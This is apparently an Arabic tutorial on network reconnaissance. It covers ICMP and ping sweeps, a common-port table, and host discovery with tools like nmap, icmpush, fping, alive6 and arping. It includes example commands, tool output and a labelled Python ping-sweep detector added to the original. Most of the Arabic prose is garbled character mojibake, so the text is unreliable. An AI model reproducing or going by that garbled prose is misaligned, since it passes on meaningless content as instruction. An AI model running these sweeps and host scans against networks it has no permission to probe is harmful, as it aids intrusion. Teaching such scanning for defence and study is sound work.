I,JA ^^jll CjLg jIslaII L-jjoiai ^Uajll (j^aJaij jVI ^» J^*> tCjLa jlst-<Jl £-<^ J <^3^-^.VI (jl jlkVI ^ 4^^Ld Ijj*.Jjui (JjJjuJ LgjS

j Anonymous ^j^VI ^ ajj^SI Jj<^ uj^ <IDSj 
^^jII CjU» jIslxJI <L^aL<> Ac L_fl^JI jc ^9 uj-^ 6 (Footprinting)<^j^ * ^t^jjVl .jjj>aj 
^-Ajla ^UijV jl£ cNUi.^i ^ jUr> ^ ^-ijlgil! dj| jiaaJI ^ d^.Ij (ji j^il .(IP) ^-ijjjjVI jjjUc Ac ^ Uj,j] LaLai! CjULiJI d^a JaJjj 
CjU jIslJI ^JLlJzjj^ ajV <jj^aja!3 C5 i£j V j Footprinting IP ^j^V^ dj^j^ jj^ l^j^ 

AjW. ls a±j£ > fl^Jl I^A jc Jjj^atijll AjjLJI a]j*.^<J| ^ AJ jVI dlLa jl*-xJl i>i& ^hVlml dJ .c fl>jfrli jc Ja^S A_J jVI 

CjI jja c fll un^l Sj^aJl .(scanning) o^^^l a^I j.jc j AjUil S^ix^ ^^Ualojl djLuij ^jj^IuAj l-a^I J jj*. AjaLia] Jjj^alij* £aj> 

(Jjia (^Ic JjJ*-Il cil^ aJ tQ^a ft]t A-1j*.j>» ^ _<l^ajll3 S,Jjix» ^ c _^Jill till} £fJJj ^^j^oluiASi j-G jjAxJI jc l_jj*JI ^ ;1^>UlJjujV jL^ajVl 
^ajflj L_jLg,JJ*JI Lg 4<Jjxjuij3I ^UaJ jx* A^Aa^LujJ La Jl* 6L_fl^Jl ^aUaj ^jc .lij-a^ L_flLau£l Uiajl cdj^QJ _c V^lm^l ^Uaill ^L^IiaV Aill^xi 

.^V( 1^. a£jJo3I ^^Jc web traffic j' jj^V^ ^j^^ ^j' j ^j^V^ cJ^ 3 ^^ ^ j ^ 

A_LiJl A^JajVI 



[TYPE OF SCANNING]

diU^kJI j cjIjjjJI ^^i^j Port scanning -1 
IP jjjU^ j-a^i ^^l-j Network scanning -2 
> ^ 1 ialij o- 3 ^ Vulnerability scanning -3 



U» o^lc jillj jjVI (jc t^i-v jj ^ill o^ 3 ^^ (scanning) o^^ill 4jUr. AJajoal <J jll ialij cii^J! ^ iffill ^^jjlaIIj 

^UaII/lIjIjjjJI jli CjI^JjoJI j jj jJAx^ll A^JajU j-<iVl (3^*^ j Lnjoij l^jll <J jj^ j]| j^joj ( . lJjudJ tilli j J jl<Jl c a« > >i ialaj 

^jjtJ tAja. jji-d CjtjjjJl/iaLLal! c ~ ^ <J ^I^^I/cJ1juJJ-<J1 l(g <OVimj (_^i3l ^Uajll I^J ifll jjll j jjVl AjIIaJ JflxJ 

jiaxJ ^ ,A^lc o^cla AiaLaUJ jA I^A ,^Uaj3l (JJ^tj (j-a ^ J^^^ CjtjjjJl/iaLixJ! jxi JJC j 6L_a»_jJa]! Jalaj ^3^^ 

.Aja. jjLg ial_L<J3 l!^^ .JAslSI j-d jll ^^ic Uij^i UJ^ ^ L_a«jJall ^ jlaui tdiVl^Jl 

a_iLoc ^.UjI .ajjI laJLu^VI CjUi jIslxJI ^a^. ^ jj^VI <J^J^>^ d^.Ij c _^a (Network scanning) A^f^l jjc ^a^ill aA^c 

A-iJJ 4(Jjt.Jij1I A^Jajl tClljjjjyi A£jjoi jjc l^J] jj^ jll j^J ^^jll o^^^xJl IP jjjUc <J j^. CjLd jlxxi ^a^. c*jj£ «qJ tA^JjaJl jjc ^ajaill 
.Aj^jill L^JjJaJl A>Jaj| j CjKjmiII J jj^. ^ > ^ ^-W^^ ^^>J 4 ^ C5^j Ai^V^ ■ ^ C5^^ ^l^^Jl J ^Uajll 




[Figure: the scanning host sends TCP/IP probes to the network and gets network information back]
(OBJECTIVE OF NETWORK SCANNING)




<Jjou3U jj£I <J-*aj3 tilt-iA tL^^Jl 3 aialall J ja. dlLa ^ *J£^ 
(_)a.l (j-a t^UlUj 6(j^a jj^aJl 4a. j Jc 4 alalaH cillj J dll jsull j L_kxjJa3l Jalfij 4ijx-oJ till 

^a.1 g all ja^Jl qjI <Jj3 3 > <al ail <jL^j*Vl 4£jjui 4j J^*-^ (J 

4_lLaC (j-o. ^ alia a ^1 jjl S-l J^-] (j^J^ 3 (jC- Ailla-xi jiaJ ( " llg a j L_fl^Jl 4£jjui lU^J -^^^ 
^juiaII <jjaC J^-a. IfljjjLaJ (JJJLJJ dlLo. jlstxJl ^ jjj ^aaill 4_iLaC S-l J^-j .^iUaluaVI 

_<l^alja3l jJaj 4-^a.j Jc UK bUuel Axusu 

Ua ^ j^ati 4_jLc; ^bV L-itaAVl c>» ^jAxJI i^IUa jjfL ^ 

'IP u^j^ 6 (live hosts)^Jl u ^-^ lJL£&I ■ 
AjaJt j jqj^N (open ports) ^a. jjaJI iaUxJI j 

.A£jJd3l Jc <Jaxj 

(Jjia ,JaJ ^jl cilj£ aj .4£jJo3I jl ^Uaill J Ia jju£3 4-Sj^J L^-^ <^ ^ J-*^^ iaU-all \ (opeil pOrts)^- j^Ji iallxJl i al nn^l ■ 

\ $%L±ui Jc 4_a. jjLoJl ialLoJl t 'at .*1<l ^ t a^U 4_xJaioJl <£jJj Jjo£3 AI^joj 

(jiUaj J a^juj a\\ LiA .FOOtprintillg <J) ^-^> ^ > V^luirtH ^Uajll ^£ ^Uajll 4_A?J c fll un^l ■ 

.(JjxjujjS I ^UaJ J L_a*_jJa3l Jallj (JjjLujI Jc ^ * ^ 
jl ^Uaj (jja. .^Uaj ^1 ^^ic <jAlj3l jiaLa-xJl djI^J^illj dil^sull J J^-J ! C — J ^'^^^J t * a,> 1 u ^ Jalij ^J*laJ ■ 



(PORTS)

. jUaljVI 4-aLaJ) ^JjJ (J\_x^aj!>U ^ajujJ j CjS j S^AxIg iaLLd ^1^1 ml _L_j| jaJl 



Port Number   Service
20            FTP data transfer
21            FTP control
22            SSH
23            Telnet
25            SMTP (e-mail)
53            DNS
80            HTTP
137-139       NetBIOS
443           HTTPS
445           SMB
1433          MSSQL
3306          MySQL
3389          RDP
5800          VNC over HTTP
5900          VNC



^ ^jAslSI t^lliA .C1uj£ tiL (j-aLaJl jj jJf^l j^J> ^ J^^^ ic^-^ <JJj^j3I ^ ^jixJl (j-o. (jj^J 

jA (jJ jJJjq£J|) <JjLa3! A alia ^1 (jjIaSl ^j-d J£ .C-Uili ci^-^ (J 1 ^^ ^ clA^ Aill^oJl ^jjlall 

^ jla. j <Ja.b ^j-d ^.1 jjoj ^-LgjuJI CjULijII (J^^jj ^ajujJ 6 jj jjxq£ . JJJ^^ l!^ 

^jjjUII 6^jUa.VI (J^asu j^ll L-jLj (Jjjia (jc I jla..JJ <JjL<Jl L-jLaj^a) <jl£ ttilli ^ j -c ^UiVl 

J j^.^ 4jjj£ ^jc. jiajll (J^asu .SiaU J^la. ^ ^- u iJJ ^3 (_^^jlaj jjc. ^j^aajai -c>5 ilaJl ^jlJl JjL<Jl ci^-^ 
^^A iaLLal! ^ji j^il .ialj-Jl j jj jJJ^all S j^-a.1 <jjjoij3I liA ^ ^ja. cJ^^ (3^J^ ^-S^VI oiA tcilljLd 
dAiUJl (Ja^J (j-<i JJJ^^ L5 HjJ j lc jJjoi jj£I ialixJl (J^asu .ciL ^alaJl jj jJJxal) jt$a. CjIjUslSI (Jj-q 
.(jjoijII <Jjfj (j-<») ^ laJLujJ Ij^Uj Lja jaC. Ia jj^I J^-Vl (jiaxJlj t((iL ^alaJ! ^^UiVI c_ jLj^I <J!Lq LgLoj) 

(jjyia.1 ^ a\\ \ Jjoij-o laxJ (jl (j£-<»Jj A-Lojljill ialixJl ^jl Jc (Jasu A£jlauJl A£jjoJI diUi^a. £yz ^jAslSI 
.IgJ <LILJI CjU^aJlj A£jlui<\]| iaUxJb 5^jII JjILJI Jj^aJl ^a^Jj .^-fl^Jl ^Usull 3ijJa jj 
4£jjaJU iaiijii <^iJI *J$^^I j jfi jjj^^ ^J&-^ J ji*^ ^-^^ jA Scanning 4i^.j-a]l ^ (^jan^ll jj£jJI

Jalij 4(^11 4 FTP 'SMTP ^ILjkS) ia:>LJI iabJI cjU^JI t Jji ^Uaj <(3KyU1 ^ j^JI jl ^yMI jl^ 

.<Lala all 

ttilli _4itia^l! cjI jjVl c> Scanning 4i^>JI ^jj ."<jjj£3! jUull" ^ jiuuJt li* 1^ L^Jall Jatij jLii U L3l£ 

ftiA ^ c_fl^!l .Nessusj <Hping <Nmap ^ J ^ ji&VI j s ji&VI Cj\ j^VI o«j C5 ic Jj^aill 11a j£ jj 
.JljlkVI jb^J fiU^J! Sjjj ^ <LLJI 41^^13 t^l^VI iojta JjSj 



3.2 CHECKING FOR LIVE SYSTEMS - ICMP SCANNING



j .^yu-svi jii^ ^Lu.Vl cj^jSjjjjJI jJ > ICMP (Internet Control Message Protocol) JAs^ 1 

^jl jl i^lUa jjc. <La,lk t . ilia |til3i Jc JHa£j ;^Ua^.VI JjLujj JLoijV 4j£jjoi3I L-ll> ul j^Jl J JjIxjuliII 4 JaJl Jjfi (j-a a ^LujJ 

V * axj <jj U£ 4 W ^i 21 IP J 1 ICMP Jl uj . J^VI o^j V router <^ j*ll J Host Ullj^I jjSj 

JLalait j JLujj] J JaxIoij V j$i tilli j UDP j TCP J^ J^ JJJ lP 3 ^*^ J c '^'^J J -IP J^ c> ' 

.traceroute Ping Jl 
ICMP SCANNING 

IC1VIP J^jj (jy^ 3 U^ 0 ^ " ^aUaj J <J^lla>Jl CjL<» jIslxJI 

^.iJaj J ^1) ^U^l Jjau U^l ^ q*\ ^j^j J 1>±£a obVl .^Uaill tSlli Jl 

.Ping sbVl ^l^l^l (jjjia tdli 4£jJJI J (JaxJI 

[-L] jb^Jl J-a (5 jljJU ping J*Vt ICMP J^^ J *^Uj ^ ^auju^ c jLaJ 



ICMP QUERY 

l^a jjSj ^ill iiia jl! AikLaJI Ai ^a ^1) ^llii J^ c^jll <i l^l:i^lJ ^j^aj c>Ajjj sbl ^ ICMPush j> ICMPquery 
L 3J> jc^^ cXnetmask) <^ ^ .(TIMESTAMP) 13 ^ c> ICMP JL-J ^> c> (e 11 ^ 1 
p >ol3 ^^1 AiUnJ netmask c> jj^^ ^ .(ADDRESS MARK REQUEST) 17 ^ c> ICMP ^ j Jl- jj 
^j-oll (j^-oja ^subnet) djl^jJJI ^jc CjLa jbu* Ls lc J j> ga^JI Asu .^1 jaJLujVI (subnet) '^-p CjI^jJoII jua^j 

.broadcast address m inx^ ja lJI^IojI 
.(command line) jVl ^l^ki^U J^\£3U icmp ^ J ^^ki^ sbVl ^ 

: JU JjLiU) ? Uaj ^ 
; VLo^j ^ SbVl aiA 



# apt-get install icmpush




icmpush -h
Usage: icmpush type [options] host

Type:
  -du      Destination Unreach       -echo    Echo Request
  -info    Information Request       -mask    Address Mask Request
  -rta     Router Advertisement      -rts     Router Solicitation
  -red     Redirect                  -sq      Source Quench
  -tstamp  Timestamp                 -tx      Time Exceeded
  -param   Parameter Problem

  -v       Verbose mode on           -vv      Debug mode on
  -h       This help screen          -V       Program version
.(netmask) ^j*lt £A£*iII iijaJ -mask jLpJtj Jaj 2 * jUaUl -tstamp j^pJt

PING SCANNING OUTPUT USING NMAP 
http://nmap.org 

a) sbVI *>i& J>ikluAj .host discovery * 'Ping ^Aj~* *Ij^V Ig^b^ nnl J^ sbYl j& Nmap 

t^ICMP echo request jj e£J^ Ping o«ai &2 sbVl ^ .4£±£dl Jc lUJI J jj^jxll (j jqj » ^ l 

j-a ^J^i3 .Ilia (j-a^ill b* . ICMP ECHO^J (-UjJ t^jjJaJl jli <(ti^) JaxJI £_jJa j J c \u>ia\\ <jl£ bj .a£jj^3I Jc Jjqj^^l 

.AjU^ jl^ J!lk (j» ICMP ^ J ftj^Vl 



PING & PING SWEEP

jjjL ^ pi n g .internet Control Message Protocol (ICMP) JL^VI ^ <> j^U ^jj Ping 
[64 byte] £jb uj^j ICMP echo request ^ cs^j 6 (network traffic) £AjI#1I Jto c> £jj Jt^jj 
jl*aJI jl£ bj jl^ j! jjj^ Jc 4 [56 data bytes and 8 bytes of header information] 

tAjL<LaJ! jl^a. 6 ^ <jL^jjojV1 aJc lc jl<ui (JjjJ j <Jjaju£JI ^jja j J Ping ^O^- ^— ^ Jll (Aia^JI 4£jJoll ASLkjj) 

JjSj ( Ja»JI J J) oUaJI ^jS Jc ( Lijja^l l jl U j^kj b* j .echo reply ^ yr^^ J) J' J^jd 

Jj jLaJ! Jj j^JI Ai^ilojl ^ill dja jll JL^j J Llj 3 ajill CjL» JslxJI ^ <c j-o^ Uiajl j^jj Pings ^tiAjLull 

ping lS^*-^ .a£^juJ1 JL^ajl <LS jj (JjjUsJ Ig^bviml (j£-aj Jll j tgil^aa Jill cjULuII (jc I jjj^j Uiajl Jasu Pings j*ll j <— i^JI 
: JVI j*J\ jl^»jj Jj^jll J command prompt jt J J^Jit f ^ 6 jj^j j' 4? o- 3 ^ JU^' c> 



ping target_ip



djIjI^aVI ^-i^ J>iJjj .l^ilc ping ^-bl J j^-^ jll 5J^U c fljjja^ll ^joj! jl J*i3l IP q\ j^c Jl "target ip" Jl^f^l Jj ^^i^i ^ jjuj 
£jjl lU^j^ ^— * jj^j ping ^>°VI tUjjal jiial ^jl jj^jjjj (jn^nl 4 ^ uoj ^jjj cj^ll .ping ^*^l jj^jj 4jj,iaJI 
.ciSjill J^ 6J U^j ^ j^ echo request J^j] c> J ping j-^Vl j^iuo^ J tUUti Ajl^jj ^ echo request ^ 
(J-ftc a jffi J^ ^^>*^ ^ .Ctrl + C ^b^i> uLj 6 jij ^_>^^ cJ^jj ^—^j^ ping ^>^^l J*^- ^^^j 6 u >i ^\^ 

.(Footprinting) JlSlI c_jU3I J UjL. 

Ping .<jj^aljill obi Ia jLiicU sbVI 6^ ^ S^UIujVI 1 ^ ^ U jc^ ^ping ^Vl J-^ ^^^l 4^ u*^^ 

tt^juj^l! .cAijJaxJl c fll un^l <xi^k£ Ping *^bl ^l^klojl \ a) (SUaJ) Jc c LijJaxll ^jl£ bj La •lilaJ J SJjLq (jj^J (jl (j^uJl (j-d 

jll cjIj^VI (j-a Ai^aJI tilLiA tU3 <jjau3U ia^J! (jjoi^J .Ajliil <!Ui jjc. Sjjxj^a J Ljj^ ^ <!l J^l ping j-°VI ^q"^ (jli 

.Ping swap <^'j^V ^ 



J5I ping >aVI ijajj (> s jUc Ping swap 

J j^.^31 V^J 6 IP (JJjUc (j-d <C ^ Jj UjlUj I^JL u jj ^JJ 

.ping j-°VI ^ ^-j^j ^ <— i^JI jl Jil c5^j^ cJ^j 
ICMP echo f c> ^ c> uj^ Ping swap tij 
J (hosts) u A 1 > ?n ^ c> Jl WSl^jl request 

,^.lj djSj 

aIia J ^ jU ^jL t (alive host)-^ ^ qj^^ l jl£ bj 
u£ c> > Ping swap .ICMP ECHO Reply 

<^ dbVl ^jjjJ ^ .A£jjoJI (j^a^il (jja Uajj j ^^Sl 

^ia^. Jc j-qj JlLd L-flj > *aJJj tUjjflJ l^J£ Cl ll > ^\')a\\ 

j-oVI ^^UIujI S-n?J JaxJI J (5 ill ^Uaill & JajVl 

,^kl ^Uaj ^Jajajl ^JLoajj ^aJJ (^^1 ping 
ping 3 j\<mh A^ ^ j I^qIa^LujLj ^jII j jjjjuJI j^udj <L^Ho ping swap ^ c^Ua .ping swap ^ ^l-vVimlj
u A > ^^ t i> ^ ICMP ECHO request^W^ jj <jjji> j& u jqj > ^ l c*JJ cjI jjVl fti* .<J swap 

.li^V ^jj l_a jjoj c ^j3I j nmap ^£11 fti& cJa*j ^ j£i c _^j3I cj! j^VI j j 
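The following Python block is an added example; it is not code from the original text, nor from icmpush, ping or nmap. It decodes raw ICMP messages using the header layout and checksum rule of RFC 792, builds the Echo Request (type 8), Echo Reply (0), Timestamp (13) and Address Mask (17) messages referred to in the ICMP query and ping sections above, and then applies a defender's check to a constructed packet stream: a source that sends valid Echo Requests to many distinct hosts within a short window is reported as a ping sweep. All addresses, thresholds and sample packets are constructed for the demonstration.

```python
# Added example (not from the original text): parse raw ICMP messages (RFC 792) and flag a
# ping sweep from a constructed stream of captured packets, the view a sensor or IDS has.
import struct
from collections import defaultdict

# ICMP message types named on this page; ping uses 8/0, icmpush -tstamp uses 13, -mask uses 17.
ICMP_TYPES = {0: "Echo Reply", 8: "Echo Request", 13: "Timestamp Request",
              14: "Timestamp Reply", 17: "Address Mask Request", 18: "Address Mask Reply"}


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(msg_type: int, code: int, ident: int, seq: int, payload: bytes = b"") -> bytes:
    """Build an ICMP message; the checksum is computed with the checksum field zeroed."""
    header = struct.pack("!BBHHH", msg_type, code, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", msg_type, code, csum, ident, seq) + payload


def parse_icmp(msg: bytes) -> dict:
    """Decode the 8-byte ICMP header; checksum_ok is True when the whole message sums to zero."""
    if len(msg) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    msg_type, code, _csum, ident, seq = struct.unpack("!BBHHH", msg[:8])
    return {"type": msg_type, "name": ICMP_TYPES.get(msg_type, "other"), "code": code,
            "id": ident, "seq": seq, "checksum_ok": icmp_checksum(msg) == 0,
            "payload_len": len(msg) - 8}


def detect_ping_sweep(events, threshold: int = 10, window_s: float = 5.0) -> dict:
    """events: iterable of (time_s, src_ip, dst_ip, icmp_bytes).
    Returns {src_ip: sorted targets} for every source whose valid Echo Requests reached at
    least `threshold` distinct destinations inside any `window_s`-second window."""
    per_src = defaultdict(list)
    for t, src, dst, raw in events:
        m = parse_icmp(raw)
        if m["type"] == 8 and m["checksum_ok"]:     # corrupted or non-echo traffic is ignored
            per_src[src].append((t, dst))
    alerts = {}
    for src, hits in per_src.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            targets = {d for t, d in hits[i:] if t - t0 <= window_s}
            if len(targets) >= threshold:
                alerts[src] = sorted(targets)
                break
    return alerts


def sample_events() -> list:
    """Constructed capture (not real traffic): 10.0.0.5 sweeps 192.168.1.1-20 in two seconds,
    10.0.0.9 pings one host four times, one packet is corrupted, and one echo reply comes back."""
    ev = []
    for i in range(1, 21):
        ev.append((100.0 + i * 0.1, "10.0.0.5", "192.168.1.%d" % i,
                   build_icmp(8, 0, 0x1234, i, b"abcdefgh")))
    for i in range(4):
        ev.append((100.0 + i, "10.0.0.9", "192.168.1.50", build_icmp(8, 0, 0x4242, i)))
    bad = bytearray(build_icmp(8, 0, 1, 1))
    bad[4] ^= 0xFF                                   # flip a byte so the checksum no longer verifies
    ev.append((101.0, "10.0.0.7", "192.168.1.60", bytes(bad)))
    ev.append((101.1, "192.168.1.1", "10.0.0.5", build_icmp(0, 0, 0x1234, 1, b"abcdefgh")))
    return ev


if __name__ == "__main__":
    for src, targets in detect_ping_sweep(sample_events()).items():
        print("ping sweep from %s: %d hosts probed, e.g. %s" % (src, len(targets), targets[:3]))
```

The checksum check matters on the detection side as well as the protocol side: a sensor that counts malformed or truncated ICMP would be easy to flood with noise, so only messages that verify are counted, and only Echo Requests, since replies are the responders' traffic, not the sweeper's.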



ANGRY IP SCANNER 



[Screenshot: Angry IP Scanner scanning the range 66.249.93.1 to 66.249.93.255. Columns: IP, Ping, TTL, Hostname, Ports. Rows list 66.249.93.73 through 66.249.93.85 with ping times between 36 ms and 52 ms, TTL 245 or 246, hostnames ug-in-f73.google.com to ug-in-f85.google.com, and ports 80,443 reported open on several hosts (others n/a or n/s). Status bar: Ready, Display: All, Threads: 0.]



Source: http://angryip.org
.[IP Scanner Tools] IP o^ai Sbl j& Angry IP Scanner 
ia\_L<JI ^aaijj t Jjj^aliiilU c Luia^H ^jujI ci^Hj 6 dead node 

4* hit ^ Jaxj ftbVl ftiA .iaUJI/CjljjjJI c*Ui£j IP (jJjUc 

.255.255.255.255 1.1.1.1 c> »^ IP 



THE SOLARWINDS ENGINEER'S TOOLSET
http://www.solarwinds.com

b& CjIj^I ^l^kiujU (> cjIjjVi c> cf- * J-^- yr* The Solarwinds Engineer's Toolset 

<^jj /ftj^. <^ ^^iil IP (jjjUc j UIIa aIa^LujVI ^jS ^^jI! IP ^jjjUc Jc l-a^xjII cfi^j IP l^j^ l3^-^ ^ 

-C;r ^ DNS ^4 



ADVANCED IP SCANNER 
Source: http://www.advanced-ip-scanner.com

(Jjtij l^-Ija uill j ia^a jjAlij JjixjaLill A Jc (Jasu j l^J 

.l^ic 6^)A3LxJl Jc iaxjJal! (Jj^la (jC 1 \jt ujJJ jlj ^aJ Ajtg-J! ^** 1 JJ^^ ^J^^J (j^aLkll wizard ^ (S'lX^J ^ ■ 
[Screenshot: Advanced IP Scanner main window (menu: File, Actions, Settings, View, Help) before a scan. The range field lists 192.168.138.1 - 192.168.138.254, 192.168.16.1 - 192.168.16.254, 192.168.50.1 - 192.168.50.254. Result columns: Status, Name, IP, Manufacturer, MAC address. Status bar: 0 alive, 0 dead, 0 unknown.]



I^Vl^ lala Scan 1 u<< ^5 l^ja c_ l^oli asjj ^^jll 4£jJo3I JjUaj <jLkI! ^ £jJaj 



[Screenshot: Advanced IP Scanner after scanning 192.168.16.20 - 192.168.16.90. Results: JANA-TEBA at 192.168.16.70 (COMPAL INFORMATION, MAC 00:1E:EC:AF:FB:65), SAMA, and hosts at 192.168.16.72 (Hewlett Packard) and 192.168.16.73 (VMware, Inc., MAC 00:0C:29:0D:A3:A4). Status bar: 3 alive, 0 dead, 18 unknown.]



wake-on-lan ^ <— * ^-i^jall ip ^jjjUc ^^ic ^ jLoll o-^VI j jib Jai^jall Aic 

.Abort shutdownj shutdownj 
.NetBIOS cjUjL^j MAC j ^»VI j IP j' W^3I <> <i ^ ^ 

A \y* ujJ S^lc] jl 4_i^jJa3l jl^a. (jp^-l 



FPING

<jt fib! Ljajl (j^-AJ . Jt-Lajiil! \$\\* uii ^jjj <^-£ ^ FPing ^ .FPing is**** stai ping swap l!^*-^ ^^A 3 

;^U3I j^VI j (Terminal) ^ FPing J^-^ <J$^' .Windows J ^ - ^ SI ^Uajl t ^vi 



# fping -a -g 172.16.45.1 172.16.45.254 > hosts.txt



i^jj j jjjIj cPW^ ^j^j^ liA j .LkJ ^U3I (live host) *W^VI ujqj>^l jlg-SaV "-a" ^hviml 

liA ^ .IP (jJjUsJ 4_ig-^J ^jl^Jl l>* <-J^ J^j .l^juoai ^jjj ^1 IP (jJjUc; ^ (jUaj b^aal "-g" ^1 ikU .6*ljSJt 

4L_aL ^ j gSUlt ^ jd ">" j^JI ^^1^ .172.16.45.254 ^172.16.45.1 <> IP ^ 'J 1 ^' 
."cat" j*VI ^l^klujl j) oajll jj^j <^ Lai <hosts.txt lP 3 ^ ^jLuII l^LJI ^j^j] "hosts.txt" ^l^i^l 

.{cat hosts.txt} 4? JL^j^l <J Jtill j*Vl lM 'hosts.txt cjLj^



https://www.facebook.com/tibea2004 



.(man fping) ^ man

cj^jj ^1 4i^lauJI Sj^VI ojUij] ^ill hosts.txt ^-al^ ^ «j 4 f ping J^-^j p-I^VI ^j^j 

< * a j - b o (jaJ <j| j^ilj (jl ^ &1I (j-a <^-^j ^ sj/°^ ^ l^i^Loaj ^^jl! 4^jla ^jjlixJI £>3& l al - ^ ^j! ^, .fping ,>*VI <^£i3 
.ping cs - ^ ( ♦ ^ * ping c3^** j^'^^ A ^ 6 ping ^ < . u^Lujj l_a jjuj 

Colasoft Ping Tool available at http://www.colasoft.com

Visual Ping Tester - Standard available at http://www.pingtester.net

Ping Scanner Pro available at http://www.digilextechnologies.com

Ultra Ping Pro available at http://ultraping.webs.com

PingInfoView available at http://www.nirsoft.net

PacketTrap MSP available at http://www.packettrap.com

Ping Sweep available at http://www.whatsupgold.com

Network Ping available at http://www.greenline-soft.com

Ping Monitor available at http://www.niliand.com

Pinkie available at http://www.ipuptime.net

U j£i *J ^1 CjIj^VI J I 4iLjaVlj (live hOSt) u ^ L t5 HS Jjij&lll J laL ^aUJl CjIj^V) Lpasu ^jj 

;<JU3I ^Ajlill diaJj ^ j^jj c ^j3I j ILL* 

Application -> Information Gathering -> Live Host Identification 

alive6 - arping - cdpsnarf - detect-new-ip-6 - detect_sniffer - dmitry - dnmap-client - dnmap-server -
hping3 - inverse_lookup6 - Miranda - ncat - netdiscover - passive_discovery6 - thcping6 - wol-e -
xprobe2



alive6 ■ 

^ j <JL±\ c*\ j±xu J oj± JU^ jsll ^ yj\ J^L THC-IPV6- ATTACK-TOOLKIT &\ c> *W j* 



# alive6
alive6 v2.0 (c) 2012 by van Hauser / THC <vh@thc.org> www.thc.org

Syntax: alive6 [-I srcip6] [-i file] [-o file] [-DM] [-p] [-F] [-e opt] [-s port,..] [-a port,..] [-u port,..] [-W TIME] [-dlrvS] interface [unicast-or-multicast-address [remote-router]]

Shows alive addresses in the segment. If you specify a remote router, the packets are sent with a routing header prefixed by fragmentation

Options:
  -i file          check systems from input file
  -o file          write results to output file
  -M               enumerate hardware addresses (MAC) from input addresses (slow!)
  -D               enumerate DHCP address space from input addresses
  -p               send a ping packet for alive check (default)
  -e dst,hop       send an errornous packets: destination (default), hop-by-hop
  -s port,port,..  TCP-SYN packet to ports for alive check
  -a port,port,..  TCP-ACK packet to ports for alive check
  -u port,port,..  UDP packet to ports for alive check
  -d               DNS resolve alive ipv6 addresses
  -n number        how often to send each packet (default: local 1, remote 2)
  -W time          time in ms to wait after sending a packet (default: 1)
  -S               slow mode, get best router for each remote target or when proxy-NA
  -I srcip6        use the specified IPv6 address as source
  -l               use link-local address instead of global address
  -v               verbose (twice: detailed information, thrice: dumping all packets)

Asu (jc 4.1^. jl^a. du3 131 .IPv6 U^J^ C ' (^5^ ^ L)£^ ls* ^A^Lolj SbVl £>3& 

.(routing header prefixed by fragmentation) ^j^t u^'j J^jj ^ '(Remote router) 
I^VIS tSUij ICMP6 Jl^jl ^ ^l^klaal Lia^j U jSl



# alive6 still

Warning: unprefered IPv6 address had to be selected
Alive: fe80::20c:29ff:fe97:320f
Found 1 system alive

arping ■ 

t^jj* J*" JI>JI ^ j ICMP request t> e> J cU* 2 Ping sbVl JjS <> L j£i L£ 

Jl qc* diaali ^£ ^^kiaa-a J j£ jj jjj) ARP ^ J^j^ j ping staVI J^c (jjaib f jij arping sbVI j ^ I J-**-^ 

jjjL ^ tsUij pi n g A^j^ L> Sc (IP Address J cf 4^WI 4£±^l ^ s^j^ll s j^bU MAC Address 

, jAx-£3^11 JP (jl JJC 

(jl jJC (j^^ia (jC Lai J^-a (jj^J (hOSt) t fl^a^all .£tjU3l <j!a^>xJ ^jli ^aJ ^ ^ rail L_flJjJaxJl ^1 ARP cJ^J^ arping S^cLolaII SbVI 

.<j qA±\\ MAC u'j^ j 1 ^ IP 



~# arping -c 4 192.168.16.70
ARPING 192.168.16.70
60 bytes from 00:1e:ec:af:fb:65 (192.168.16.70): index=0 time=40.039 usec
60 bytes from 00:1e:ec:af:fb:65 (192.168.16.70): index=1 time=17.070 usec
60 bytes from 00:1e:ec:af:fb:65 (192.168.16.70): index=2 time=17.070 usec
60 bytes from 00:1e:ec:af:fb:65 (192.168.16.70): index=3 time=16.946 usec

--- 192.168.16.70 statistics ---
4 packets transmitted, 4 packets received, 0% unanswered (0 extra)



















^ jill (j-a ^3^ 4 JLujjI ^ ^^Ij 4 I <*.v^ml UjI ^jla^)il3j IgJLuijI ^jjj ^^jII ^3^ L£^J ["C] JJJ**^ ^ LaAalLujI 

.l^la JLujjVI fJJ ^jjuj ^1 .nil CjjIS ^j^i3 -J jLrkJl Liajl ^^klaij .ARP 

aJl 4^uJl ^ J^u Jj£ jj JJ^I 1-^ I^Ua j^a 

detect-new-ip-6 ■ 

.U^aJI *£*51l J\ 4^iaJI ^Jl IPv6 ojj^ (> ^-LSSil THC-IPV6-ATTACK-TOOLKIT ^» c> *W 



# detect-new-ip6 eth0
Started ICMP6 DAD detection (Press Control-C to end) ...



detect_sniffer6 ■ 

*1 I i] ci^] ^k-M LAN ^J* f U»3ll j& J THC-IPV6-ATTACK-TOOLKIT o» »^ 

Ij^L c ^j3I j t^^i^-all JabjjVI (jl J^C ^1,^ nnl ^aJJ q V^l ^.A^J ^aJJ ^3 lil .BSD (J^^ ^aUaj 4(Jj>£ jjJ i jj^JJj ^-a lU*^ .V ^al Sniffing 

.Jaxj ^ I^LujJ La 



# detect_sniffer6 eth0
Sending sniffer detection packets to ff02::1
No packets received, no vulnerable system seems to be sniffing



inverse_lookup6 ■ 

J^^i] t (inverse address query)c>-j^ u'j^ e^ 3 ^ 1 ^ THC-IPV6-ATTACK-TOOLKIT <> ^1^1 ^ 

. jVI £ jJ^a j^ll liA g-jll ^LJajVl c> .MAC ^ VJ T " ^ C5^^ IPv6 L^J^ 



# inverse_lookup6 interface mac-address



miranda ■ 

jlj^JI dj^j lil) lJ^JI ^jJt o-a^il UPnP (universal plug and play) Jj^jjj ^^i^ ^1 sbVl ^ Miranda 
Ai^stxi ciL^ uj^ ( ; miranda ^ cJ-^^ cJ^ _4_i^jai3 <jjajc l^jli <J j^j^>^^ ^ (JjjuuHj ^ jiii ^^Irouter L * ^ ? ^-^^j "Su^ 

UPnP m 

AiikJI jjjU^I <> <c ^ '(UPnP IjL^l) i (Universal Plug and Play i^j^VW) cr^^t J^i^tj v^J^' ^ J 

